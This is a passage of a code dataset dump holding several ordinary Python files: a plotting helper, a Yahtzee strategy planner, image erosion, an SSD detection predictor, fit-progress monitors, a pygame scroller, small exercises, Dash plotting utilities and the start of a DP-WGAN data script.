resource\n","sub_path":"tuttle/workflow_builder.py","file_name":"workflow_builder.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"593080842","text":"from mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef graf3D(tab) :\n Nx,Ny=np.shape(tab)\n \n fig = plt.figure()\n ax = fig.gca(projection='3d')\n X = np.arange(0, Nx, 1)\n Y = np.arange(0, Ny, 1)\n X, Y = np.meshgrid(X, Y)\n Z = tab\n surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\n ax.set_zlim(-1.01, 1.01)\n \n ax.zaxis.set_major_locator(LinearLocator(10))\n 
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n \n fig.colorbar(surf, shrink=0.5, aspect=5)\n \n plt.show()","sub_path":"hgraphiques.py","file_name":"hgraphiques.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"256881824","text":"\"\"\"\nLast Roll Strategy Planner for Simplified Yahtzee\nSimplifications: only allow discard and roll, only score against upper level\n\"\"\"\n\n# Used to increase the timeout, if necessary\n# import codeskulptor\n# codeskulptor.set_timeout(20)\n\n\ndef gen_all_sequences(outcomes, length):\n \"\"\"\n Iterative function that enumerates the set of all sequences of\n outcomes of given length.\n \"\"\"\n # Function created by instructors. Leave it alone.\n answer_set = set([()])\n for dummy_idx in range(length):\n temp_set = set()\n for partial_sequence in answer_set:\n for item in outcomes:\n new_sequence = list(partial_sequence)\n new_sequence.append(item)\n temp_set.add(tuple(new_sequence))\n answer_set = temp_set\n return answer_set\n\n\ndef score(hand):\n \"\"\"\n Compute the maximal score for a Yahtzee hand according to the\n upper section of the Yahtzee score card.\n\n hand: full yahtzee hand\n\n Returns an integer score\n \"\"\"\n scores = []\n for die_value in set(hand):\n occurances = hand.count(die_value)\n scores.append(occurances * die_value)\n return max(scores)\n\n\ndef expected_value(held_dice, num_die_sides, num_free_dice):\n \"\"\"\n Compute the expected value based on held_dice given that there\n are num_free_dice to be rolled, each with num_die_sides.\n\n held_dice: dice that you will hold\n num_die_sides: number of sides on each die\n num_free_dice: number of dice to be rolled\n\n Returns a floating point expected value\n \"\"\"\n sides_of_die = set(range(1, num_die_sides + 1))\n possible_rolls = gen_all_sequences(sides_of_die, num_free_dice)\n resulting_hands = []\n expected_score = 0\n for roll in possible_rolls:\n hand = sorted(held_dice + roll)\n resulting_hands.append(hand)\n for hand in resulting_hands:\n expected_score += score(hand) / float(len(resulting_hands))\n return expected_score\n\n\ndef gen_all_holds(hand):\n \"\"\"\n Generate all possible choices of dice from hand to hold.\n\n hand: full yahtzee hand\n\n Returns a set of tuples, where each tuple is dice to hold\n \"\"\"\n possible_holds = set([()])\n for die in hand:\n temporary_set = set()\n for subset in possible_holds:\n new_subset = list(subset) + [die]\n new_subset = tuple(new_subset)\n temporary_set.add(new_subset)\n possible_holds.update(temporary_set)\n return possible_holds\n\n\ndef strategy(hand, num_die_sides):\n \"\"\"\n Compute the hold that maximizes the expected value when the\n discarded dice are rolled.\n\n hand: full yahtzee hand\n num_die_sides: number of sides on each die\n\n Returns a tuple where the first element is the expected score and\n the second element is a tuple of the dice to hold\n \"\"\"\n possible_holds = gen_all_holds(hand)\n scored_hands = []\n for held_dice in possible_holds:\n num_free_dice = len(hand) - len(held_dice)\n expected_score = expected_value(held_dice, num_die_sides, num_free_dice)\n scored_hand = (expected_score, held_dice)\n scored_hands.append(scored_hand)\n scored_hands.sort()\n return scored_hands[-1]\n\n\ndef run_example():\n \"\"\"\n Compute the dice to hold and expected score for an example hand\n \"\"\"\n num_die_sides = 6\n hand = (1, 1, 1, 5, 6)\n hand_score, hold = strategy(hand, num_die_sides)\n print(\"Best 
strategy for hand\", hand, \"is to hold\", hold,\n \"with expected score\", hand_score)\n\n# run_example()\n","sub_path":"strategy_planner.py","file_name":"strategy_planner.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"181813191","text":"#!/usr/local/bin/python3.5\nimport sys\nfrom PIL import Image\n\ninfilename = sys.argv[1]\noutfilename = sys.argv[2]\n\nin_img = Image.open(infilename)\nout_img = Image.new('L', in_img.size)\n\n# define basic settings\nwidth, height = in_img.size\nBLACK = 0\nWHITE = 255\n\nmask_2d = [\\\n (-1,-2),(0,-2),(1,-2),\\\n (-2,-1),(-1,-1),(0,-1),(1,-1),(2,-1),\\\n (-2,0),(-1,0),(0,0),(1,0),(2,0),\\\n (-2,1),(-1,1),(0,1),(1,1),(2,1),\\\n (-1,2),(0,2),(1,2)\\\n]\n\n# get 1D image data\ndata_seq = list(in_img.getdata())\nout_data = [0] * len(data_seq)\n\nfor y in range(height):\n for x in range(width):\n if data_seq[y * width + x] == WHITE:\n for m in mask_2d:\n p = (x + m[0], y + m[1])\n if p[0] < 0 or p[0] >= width or p[1] < 0 or p[1] >= height:\n break\n elif data_seq[p[1] * width + p[0]] != WHITE:\n break\n else:\n out_data[y * width + x] = WHITE\n\n# save output image\nout_img.putdata(out_data)\nout_img.save(outfilename, 'bmp')\n","sub_path":"hw4/erosion.py","file_name":"erosion.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"317453195","text":"import torch\n\nfrom .. import utils as box_utils\nfrom ..misc import Timer\n\nfrom torch.nn import functional as F\n\n\nclass Predictor:\n def __init__(self, net, priors, nms_method=None, center_variance=0.1, size_variance=0.2,\n nms_threshold=0.45, filter_threshold=0.01, candidate_size=200, sigma=0.5):\n self.net = net\n self.nms_threshold = nms_threshold\n self.filter_threshold = filter_threshold\n self.candidate_size = candidate_size\n self.nms_method = nms_method\n self.priors = priors\n self.center_variance = center_variance\n self.size_variance = size_variance\n\n self.sigma = sigma\n\n self.timer = Timer()\n\n def predict(self, image, top_k=-1, prob_threshold=None, verbose=False, return_outputs=False):\n cpu_device = torch.device(\"cpu\")\n _, height, width = image.shape\n images = image.unsqueeze(0)\n with torch.no_grad():\n self.timer.start()\n outs = self.net.forward(images)\n confidences, locations = outs[:2]\n #print('TYPE')\n #print(locations.is_cuda)\n scores = F.softmax(confidences, dim=2)\n boxes = box_utils.convert_locations_to_boxes(locations, self.priors, self.center_variance, self.size_variance)\n boxes = box_utils.center_form_to_corner_form(boxes)\n del locations\n if verbose:\n print(\"Inference time: \", self.timer.end())\n boxes = boxes[0]\n scores = scores[0]\n if not prob_threshold:\n prob_threshold = self.filter_threshold\n # this version of nms is slower on GPU, so we move data to CPU.\n boxes = boxes.to(cpu_device)\n scores = scores.to(cpu_device)\n picked_box_probs = []\n picked_labels = []\n for class_index in range(1, scores.size(1)):\n probs = scores[:, class_index]\n mask = probs > prob_threshold\n probs = probs[mask]\n if probs.size(0) == 0:\n continue\n subset_boxes = boxes[mask, :]\n box_probs = torch.cat([subset_boxes, probs.reshape(-1, 1)], dim=1)\n box_probs = box_utils.nms(box_probs, self.nms_method,\n score_threshold=prob_threshold,\n nms_threshold=self.nms_threshold,\n sigma=self.sigma,\n top_k=top_k,\n candidate_size=self.candidate_size)\n picked_box_probs.append(box_probs)\n 
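# record the class label for every box kept by this class's NMS pass\n            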
picked_labels.extend([class_index] * box_probs.size(0))\n if not picked_box_probs:\n return torch.tensor([]), torch.tensor([]), torch.tensor([])\n picked_box_probs = torch.cat(picked_box_probs)\n picked_box_probs[:, 0] *= width\n picked_box_probs[:, 1] *= height\n picked_box_probs[:, 2] *= width\n picked_box_probs[:, 3] *= height\n if return_outputs:\n return picked_box_probs[:, :4], torch.tensor(picked_labels), picked_box_probs[:, 4], outs\n else:\n return picked_box_probs[:, :4], torch.tensor(picked_labels), picked_box_probs[:, 4]\n","sub_path":"vision/tasks/detection/ssd_qfgaohao/ssd/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"434873561","text":"import os\nfrom threading import Thread\nfrom copy import deepcopy\n\nfrom PyQt5.QtCore import pyqtSignal, QObject\n\nfrom bumps.dream.state import MCMCDraw\nfrom bumps.monitor import TimedUpdate, Monitor\nfrom bumps.fitproblem import BaseFitProblem\nimport numpy as np\n\nRATE = 1\n\nclass ConvergenceMonitor(Monitor, QObject):\n\t\"\"\"\n\tGather statistics about the best, worst, median and +/- 1 interquartile\n\trange. This will be the input for the convergence plot.\n\t\"\"\"\n\n\tFitProgressEvent = pyqtSignal(np.ndarray)\n\n\tdef __init__(self, problem, rate=RATE):\n\t\tQObject.__init__(self)\n\t\tself.time = 0\n\t\tself.rate = rate\n\t\tself.problem = problem\n\t\tself.pop = []\n\n\tdef config_history(self, history):\n\t\thistory.requires(population_values=1, value=1, time=1)\n\n\tdef __call__(self, history):\n\t\tbest = history.value[0]\n\t\ttry:\n\t\t\tpop = history.population_values[0]\n\t\t\tn = len(pop)\n\t\t\tp = np.sort(pop)\n\t\t\tQI, Qmid, = int(0.2 * n), int(0.5 * n)\n\t\t\tself.pop.append((best, p[0], p[QI], p[Qmid], p[-1 - QI], p[-1]))\n\t\texcept AttributeError:\n\t\t\tself.pop.append((best,))\n\n\t\tif history.time[0] >= self.time+self.rate:\n\t\t\tself.FitProgressEvent.emit(self.progress())\n\t\t\tself.time = history.time[0]\n\n\tdef progress(self):\n\t\tif not self.pop:\n\t\t\treturn None\n\t\telse:\n\t\t\treturn np.array(self.pop)\n\nclass DreamMonitor(Monitor, QObject):\n\n\tFitProgressEvent = pyqtSignal(BaseFitProblem, MCMCDraw)\n\n\tdef __init__(self, problem, rate=RATE):\n\t\tQObject.__init__(self)\n\t\tself.time = 0\n\t\tself.rate = rate\n\t\tself.problem = problem\n\t\tself.uncertainty_state = None\n\t\treturn\n\n\tdef config_history(self, history):\n\t\thistory.requires(time=1)\n\t\treturn\n\n\tdef __call__(self, history):\n\t\ttry:\n\t\t\tself.uncertainty_state = history.uncertainty_state\n\t\t\tif history.time[0] >= self.time+self.rate:\n\t\t\t\tself.FitProgressEvent.emit(self.problem, deepcopy(self.uncertainty_state))\n\t\t\t\tself.time = history.time[0]\n\t\texcept AttributeError:\n\t\t\tself.uncertainty_state = None\n\n\t\treturn\n\n\tdef final(self):\n\t\tif self.uncertainty_state:\n\t\t\tself.FitProgressEvent.emit(self.problem, deepcopy(self.uncertainty_state))\n\t\treturn\n\nclass QtProgressMonitor(TimedUpdate, QObject):\n\n\tFitProgressEvent = pyqtSignal(BaseFitProblem, str, float, float, np.ndarray)\n\n\tdef __init__(self, problem):\n\t\tQObject.__init__(self)\n\t\tTimedUpdate.__init__(self, progress=RATE, improvement=RATE)\n\t\tself.problem = problem\n\n\tdef show_progress(self, history):\n\t\t# self.FitProgressEvent.emit(problem=self.problem, message=\"progress\", step=history.step[0], value=history.value[0], 
point=history.point[0]+0)\n\t\tself.FitProgressEvent.emit(self.problem, \"progress\", history.step[0], history.value[0], history.point[0] + 0)\n\t\treturn\n\n\t# def show_improvement(self, history):\n\t# \tself.FitProgressEvent.emit(problem=self.problem, message=\"improvement\", step=history.step[0], value=history.value[0], point=history.point[0]+0)\n\t\t# self.FitProgressEvent.emit(self.problem, \"improvement\", history.step[0], history.value[0], history.point[0] + 0)\n\t\t# return","sub_path":"monitors.py","file_name":"monitors.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"412172246","text":"\"\"\"\n Pygame player\n\n\"\"\"\n\nimport pygame\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n\n # Initialize base class\n super(Player, self).__init__()\n\n width = 40\n height = 60\n\n self.image = pygame.Surface([width, height])\n self.image.fill(RED)\n\n self.rect = self.image.get_rect()\n\n self.change_x = 0\n self.change_y = 0\n\n self.level = None\n\n def update(self):\n self.calculate_gravity()\n\n self.rect.x += self.change_x\n\n if self.rect.x >= 500:\n pass\n\n hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\n for item in hit_list:\n if self.change_x > 0:\n self.rect.right = item.rect.left\n elif self.change_x < 0:\n self.rect.left = item.rect.right\n\n self.rect.y += self.change_y\n\n hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\n for item in hit_list:\n if self.change_y > 0:\n self.rect.bottom = item.rect.top\n elif self.change_y < 0:\n self.rect.top = item.rect.bottom\n\n self.change_y = 0\n\n def go_left(self):\n self.change_x = -6\n\n def go_right(self):\n self.change_x = 6\n\n def stop(self):\n self.change_x = 0\n\n def jump(self):\n self.change_y = -10\n\n def calculate_gravity(self):\n if self.change_y == 0:\n self.change_y = 1\n else:\n self.change_y += 0.35\n\n # On the ground?\n if self.rect.y >= SCREEN_HEIGHT - self.rect.height and self.change_y >= 0:\n self.change_y = 0\n self.rect.y = SCREEN_HEIGHT - self.rect.height\n\n\nclass Platform(pygame.sprite.Sprite):\n def __init__(self, width, height):\n # Initialize base class\n super(Platform, self).__init__()\n\n self.image = pygame.Surface([width, height])\n self.image.fill(GREEN)\n\n self.rect = self.image.get_rect()\n\n\nclass Level(object):\n def __init__(self):\n self.platform_list = pygame.sprite.Group()\n self.world_shift = 0\n\n def update(self):\n self.platform_list.update()\n\n def draw(self, screen):\n screen.fill(BLUE)\n self.platform_list.draw(screen)\n\n def shift_world(self, shift_x):\n self.world_shift += shift_x\n\n for item in self.platform_list:\n item.rect.x += shift_x\n\n\nclass Level01(Level):\n def __init__(self):\n\n Level.__init__(self)\n\n self.level_limit = -500\n\n # levels = [[210, 70, 500, 500],\n # [210, 70, 200, 400],\n # [210, 70, 600, 300]]\n\n levels = [[210, 70, 500, 500],\n [210, 70, 800, 400],\n [210, 70, 1000, 500],\n [210, 70, 1120, 280],\n ]\n\n for level in levels:\n platform = Platform(level[0], level[1])\n platform.rect.x = level[2]\n platform.rect.y = level[3]\n self.platform_list.add(platform)\n\n\nclass Level02(Level):\n def __init__(self):\n\n Level.__init__(self)\n\n self.level_limit = -1000\n\n levels = [[210, 30, 450, 570],\n 
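# each row is [width, height, x, y] for one platform\n                  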
[210, 30, 850, 420],\n [210, 30, 1000, 520],\n [210, 30, 1120, 280]]\n\n for level in levels:\n platform = Platform(level[0], level[1])\n platform.rect.x = level[2]\n platform.rect.y = level[3]\n self.platform_list.add(platform)\n\n\ndef main():\n pygame.init()\n\n # Set the width and height of the screen [width, height]\n size = (SCREEN_WIDTH, SCREEN_HEIGHT)\n screen = pygame.display.set_mode(size)\n\n pygame.display.set_caption(\"My Game\")\n\n # Create the player\n player = Player()\n\n levels = []\n levels.append(Level01())\n levels.append(Level02())\n current_level_number = 0\n current_level = levels[current_level_number]\n\n player.level = current_level\n\n # Create the sprite group\n active_sprite_list = pygame.sprite.Group()\n\n player.rect.x = 100\n player.rect.y = 100\n\n active_sprite_list.add(player)\n\n # Loop until the user clicks the close button.\n done = False\n\n # Used to manage how fast the screen updates\n clock = pygame.time.Clock()\n\n # -------- Main Program Loop -----------\n while not done:\n # --- Main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n player.go_left()\n elif event.key == pygame.K_RIGHT:\n player.go_right()\n elif event.key == pygame.K_UP:\n player.jump()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n player.stop()\n elif event.key == pygame.K_RIGHT:\n player.stop()\n\n # --- Game logic should go here\n active_sprite_list.update()\n\n # Update the level\n current_level.update()\n\n if player.rect.right >= 500:\n diff = player.rect.right - 500\n current_level.shift_world(-diff)\n player.rect.right = 500\n\n if player.rect.left <= 120:\n diff = 120 - player.rect.left\n current_level.shift_world(diff)\n player.rect.left = 120\n\n position = player.rect.x + current_level.world_shift\n if position < current_level.level_limit:\n\n # Go to the next level (if there is one)\n if current_level_number < len(levels) - 1:\n current_level_number += 1\n current_level = levels[current_level_number]\n player.level = current_level\n player.rect.left = 120\n\n # --- Screen-clearing code goes here\n\n # Here, we clear the screen to white. 
Don't put other drawing commands\n # above this, or they will be erased with this command.\n\n # If you want a background image, replace this clear with blit'ing the\n # background image.\n #screen.fill(WHITE)\n\n # --- Drawing code should go here\n current_level.draw(screen)\n active_sprite_list.draw(screen)\n\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n\n # --- Limit to 60 frames per second\n clock.tick(60)\n\n # Close the window and quit.\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"source/4_pygame_scroller.py","file_name":"4_pygame_scroller.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"233831540","text":"\"\"\"\nGiven a non-negative integer n, print the nth Fibonacci number.\nDo this by writing a function fib(n) which takes\nthe non-negative integer n and returns the nth Fibonacci number.\n\nDon't use loops, use the flair of recursion instead.\nHowever, you should think about why the recursive method\nis much slower than using loops.\n\"\"\"\n\n\ndef fib(n):\n if n <= 1:\n return n\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef main():\n print(\"Please input n element in fibonacci number:\")\n n = int(input())\n\n print(\"Value of \" + str(n) + \" number in sequence is \" + str(fib(n)))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"students/semko_krzysztof/lesson_04_unit_testing/fibonacci_numbers.py","file_name":"fibonacci_numbers.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"348367265","text":"# student = {\n# \"name\": \"Aaron\",\n# \"owns_dog\": False,\n# \"num_courses\": 1,\n# \"favourite_language\": \"Python, C\",\n# \"is_hillarious\": True,\n# 13: \"my favourite number!\"\n# }\n\n# artist = {\n# \"first\": \"Neil\",\n# \"last\": \"Young\",\n# }\n#\n# full_name = artist['first'] + \" \" + artist['last']\n#\n# print(full_name)\n\n# donations = dict(sam=25.0, lena=88.99, chuck=13.0, linus=99.5, stan=150.0, lisa=50.25, harrison=10.0)\n# # DON'T TOUCH PLEASE!\n# for v in donations.values():\n# total_donations += v\n# print(total_donations)\n\n# from random import choice\n# food = choice([\"cheese pizza\", \"quiche\", \"morning bun\", \"gummy bear\", \"tea cake\"])\n\n# bakery_stock = {\n# \"almond croissant\": 12,\n# \"toffee cookie\": 3,\n# \"morning bun\": 1,\n# \"chocolate chunk cookie\": 9,\n# \"tea cake\": 25\n# }\n\n# YOUR CODE GOES BELOW:\n# if food in bakery_stock.keys():\n# print(\"{} left\".format(bakery_stock[food]))\n# else:\n# print(\"We don't make that\")\n\ninventory = {'croissant': 19, 'bagel': 4, 'muffin': 8, 'cake': 1} # DON'T CHANGE THIS LINE!\n\n# Make a copy of inventory and save it to a variable called stock_list USE A DICTIONARY METHOD\nstock_list = {}\nstock_list.update(inventory)\n# print(stock_list)\n# add the value 18 to stock_list under the key \"cookie\"\nnew_stock = dict(cookie=18)\nstock_list.update(new_stock)\n\n# remove 'cake' from stock_list USE A DICTIONARY METHOD\nstock_list.pop('cake')\nprint(stock_list)\n","sub_path":"first_dictionary.py","file_name":"first_dictionary.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"47901649","text":"import yaml\nimport logging\n\n# get configuration file\nwith open(\"config.yaml\") as ymlfile:\n try:\n cfg = 
yaml.safe_load(ymlfile)['configuration']\n\n    except yaml.YAMLError as exc:\n        print(exc)\n\n# get logger\n#FORMAT = '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'\n#logging.basicConfig(level=logging.DEBUG, format=FORMAT)\nlogging.basicConfig(level=logging.DEBUG, filemode='w')\nlogger = logging.getLogger()\n\nfh = logging.FileHandler('Results/output.log', mode='w')\nfh.setLevel(logging.DEBUG)\n#formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\n#fh.setFormatter(formatter)\nlogger.addHandler(fh)\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"140537332","text":"import pandas as pd\nfrom app.extensions import mongo\nimport numpy as np\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\n\ndef getdata_from_variable(variablename):\n    mydata = mongo.db['data'].find({\"variable_name\" :variablename})\n    df = pd.DataFrame(list(mydata))\n    return df\n\ndef getvariables():\n    myvar = mongo.db['variables'].find()\n    df = pd.DataFrame(list(myvar))\n    print('variable = ', df)\n    return df\n\ndef getdata(current_variable, current_version):\n    mydata = mongo.db[current_version].find({\"info.source\" : \"kr\",\"info.type\":\"calibration\"})\n    data = []\n    for d in mydata:\n        data.append(d['processes'][current_variable])\n    df = pd.DataFrame.from_dict(data, orient='columns')\n    return df\n\ndef getalldata():\n    mydata = mongo.db['data'].find()\n    df = pd.DataFrame(list(mydata))\n    straxversion = mydata.distinct('strax_version')\n    return df\n\ndef getstraxversion():\n    mydata = mongo.db['data'].find()\n    straxversion = mydata.distinct('strax_version')\n    return straxversion\n\n \nimport dash_html_components as html\n\n\ndef make_dash_table(selection, df):\n    \"\"\" Return a dash definition of an HTML table from a Pandas dataframe. \"\"\"\n\n    df_subset = df.loc[df[\"NAME\"].isin(selection)]\n    table = []\n\n    for index, row in df_subset.iterrows():\n        rows = []\n        rows.append(html.Td([row[\"NAME\"]]))\n        rows.append(html.Td([html.Img(src=row[\"IMG_URL\"])]))\n        rows.append(html.Td([row[\"FORM\"]]))\n        rows.append(\n            html.Td([html.A(href=row[\"PAGE\"], children=\"Datasheet\", target=\"_blank\")])\n        )\n        table.append(html.Tr(rows))\n\n    return table\n\n\n\ndef _create_axis(axis_type, variation=\"Linear\", title=None):\n    \"\"\"\n    Creates a 2d or 3d axis.\n    :params axis_type: 2d or 3d axis\n    :params variation: axis type (log, line, linear, etc)\n    :params title: axis title\n    :returns: plotly axis dictionary\n    \"\"\"\n\n    if axis_type not in [\"3d\", \"2d\"]:\n        return None\n\n    default_style = {\n        \"background\": \"rgb(255, 255, 255)\",\n        \"gridcolor\": \"rgb(230, 230, 230)\",\n        \"zerolinecolor\": \"rgb(0, 0,0)\",\n    }\n\n    if axis_type == \"3d\":\n        return {\n            \"showbackground\": True,\n            \"backgroundcolor\": default_style[\"background\"],\n            \"gridcolor\": default_style[\"gridcolor\"],\n            \"title\": title,\n            \"type\": variation,\n            \"zerolinecolor\": default_style[\"zerolinecolor\"],\n        }\n\n    if axis_type == \"2d\":\n        return {\n            \"backgroundcolor\": \"rgb(255,255,255)\",\n            \"gridcolor\": default_style[\"gridcolor\"],\n            \"title\": title,\n            \"zerolinecolor\": default_style[\"zerolinecolor\"],\n            \"color\": \"#000000\",\n        } \n\n\ndef _black_out_axis(axis):\n    axis[\"showgrid\"] = True\n    axis[\"zeroline\"] = True\n    axis[\"color\"] = \"rgb(0,0,0)\"\n    return axis\n\n\ndef _create_layout(layout_type, xlabel, ylabel):\n    \"\"\" Return dash plot layout. 
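The layout_type argument selects between the scatter3d, histogram2d and scatter styles below. 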
\"\"\"\n\n base_layout = {\n \"font\": {\"family\": \"Raleway\", \"size\":18, \"color\":\"#7f7f7f\"},\n \"hovermode\": \"closest\",\n \"margin\": {\"r\": 50, \"t\": 20, \"l\": 100, \"b\": 100},\n \"showlegend\": False,\n }\n\n if layout_type == \"scatter3d\":\n base_layout[\"scene\"] = {\n \"xaxis\": _create_axis(axis_type=\"3d\", title=xlabel),\n \"yaxis\": _create_axis(axis_type=\"3d\", title=ylabel),\n \"zaxis\": _create_axis(axis_type=\"3d\", title=xlabel, variation=\"log\"),\n \"camera\": {\n \"up\": {\"x\": 0, \"y\": 0, \"z\": 1},\n \"center\": {\"x\": 0, \"y\": 0, \"z\": 0},\n \"eye\": {\"x\": 0.08, \"y\": 2.2, \"z\": 0.08},\n },\n }\n\n elif layout_type == \"histogram2d\":\n base_layout[\"xaxis\"] = _black_out_axis(\n _create_axis(axis_type=\"2d\", title=xlabel)\n )\n base_layout[\"yaxis\"] = _black_out_axis(\n _create_axis(axis_type=\"2d\", title=ylabel)\n )\n base_layout[\"plot_bgcolor\"] = \"black\"\n base_layout[\"paper_bgcolor\"] = \"black\"\n base_layout[\"font\"][\"color\"] = \"white\"\n\n elif layout_type == \"scatter\":\n base_layout[\"xaxis\"] = _black_out_axis(\n _create_axis(axis_type=\"2d\", title=xlabel)\n )\n base_layout[\"yaxis\"] = _black_out_axis(\n _create_axis(axis_type=\"2d\", title=ylabel)\n )\n# base_layout[\"xaxis\"] = _create_axis(axis_type=\"2d\", title=xlabel)\n# base_layout[\"yaxis\"] = _create_axis(axis_type=\"2d\", title=ylabel)\n# base_layout[\"plot_bgcolor\"] = \"white\"\n# base_layout[\"plot_bgcolor\"] = \"rgb(255, 255, 255)\"\n# base_layout[\"paper_bgcolor\"] =\"white\"\n #\"rgb(230, 230, 230)\"\n\n return base_layout\n\n\ndef create_plot(\n x,\n xlabel,\n y,\n ylabel,\n error,\n figname\n):\n data = [\n {\n \"mode\":\"markers\",\n \"coloraxis\":\"black\",\n \"x\": x,\n \"y\": y,\n \"error_y\": \n dict(\n type='data', # value of error bar given in data coordinates\n array=error,\n visible=True),\n \"text\": figname\n }\n ]\n layout = _create_layout(\"scatter\", xlabel, ylabel)\n return {\"data\": data, 'layout':layout}\n\ndef create_legend(title, unit):\n return(title + ' [' + unit + ']')\n\ndef create_plot_with_runid(\n x,\n xrunid,\n xlabel,\n y,\n ylabel,\n yunit,\n error,\n figname\n):\n\n fig = make_subplots(rows=1, cols=1)\n # vertical_spacing=0.02 \n x = pd.to_datetime(x, unit='s')\n fig.add_trace(go.Scatter(mode='markers',x=x, y=y, error_y=dict(array=error),xaxis=\"x1\"))\n fig.add_trace(go.Scatter(mode='markers',x=xrunid, y=y, error_y=dict(array=error),xaxis=\"x2\",line=None))\n fig.update_layout(height=500, width=1000,\n yaxis=dict(title= create_legend(ylabel, yunit)),\n xaxis1=dict(position=1, range=[np.min(x), np.max(x)], title=dict(text=xlabel) ) ,\n xaxis2=dict(position =1, range=[np.min(xrunid), np.max(xrunid)], overlaying='x',showgrid=False,title='Run ID'),\n font={\"family\": \"Raleway\", \"size\":18, \"color\":\"black\"},showlegend= False)\n fig[\"data\"][0][\"text\"] = figname\n # layout = _create_layout(\"scatter\", xlabel, ylabel)\n return fig\n#{\"data\": data, 'layout':layout}\n\ndef create_plot_errorx(\n x,\n xlabel,\n y,\n ylabel,\n error,\n errorx,\n figname\n):\n data = [\n {\n \"mode\":\"markers\",\n \"coloraxis\":\"black\",\n \"x\": x,\n \"y\": y,\n \"error_y\": \n dict(\n type='data', # value of error bar given in data coordinates\n array=error,\n visible=True),\n \"error_x\": \n dict(\n type='data', # value of error bar given in data coordinates\n array=errorx,\n visible=True),\n \"text\": figname\n }\n ]\n layout = _create_layout(\"scatter\", xlabel, ylabel)\n return {\"data\": data, 
'layout':layout}\n","sub_path":"frontend/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"402981643","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torchvision.utils import save_image\nimport numpy as np\nimport datetime\nimport os, sys\n#from matplotlib.pyplot import imshow, imsave\n\nfrom dpwgan import DPWGAN, MultiCategoryGumbelSoftmax\n\nimport pandas as pd\nimport torch\nimport logging\n\nfrom dpwgan import CategoricalDataset\nfrom dpwgan.utils import create_categorical_gan, percentage_crosstab\nfrom torch.autograd import Variable\n\n\ndef create_categorical_generator(noise_dim, hidden_dim, output_dims):\n generator = torch.nn.Sequential(\n torch.nn.Linear(noise_dim, hidden_dim),\n torch.nn.ReLU(),\n MultiCategoryGumbelSoftmax(hidden_dim, output_dims)\n )\n return generator\n\ndef create_categorical_discriminator(noise_dim, hidden_dim, output_dims):\n discriminator = torch.nn.Sequential(\n torch.nn.Linear(sum(output_dims), hidden_dim),\n torch.nn.LeakyReLU(),\n torch.nn.Linear(hidden_dim, 1)\n )\n return discriminator\n\ndef noise_function(n, noise_dim):\n return torch.randn(n, noise_dim)\n\ndef generate(n, noise_dim, generator):\n \"\"\"Generate a synthetic data set using the trained model\n\n Parameters\n ----------\n n : int\n Number of data points to generate\n\n Returns\n -------\n torch.Tensor\n \"\"\"\n noise = noise_function(n, noise_dim)\n fake_sample = generator(noise)\n return fake_sample\n\n# TODO: JKK: let's make this *really* simple ...\n\n\nNOISE_DIM = 10\nHIDDEN_DIM = 20\nSIGMA = 1\nlearning_rate = 1e-3\nepochs = 500\nn_critics = 5\nbatch_size = 128\nweight_clip = 1/HIDDEN_DIM\nsigma = SIGMA\n\ndef generate_data():\n df = pd.DataFrame(\n {'weather': ['sunny']*10000+['cloudy']*10000+['rainy']*10000,\n 'status': ['on time']*8000+['delayed']*2000\n + ['on time']*3000+['delayed']*5000+['canceled']*2000\n + ['on time']*2000+['delayed']*4000+['canceled']*4000}\n )\n return 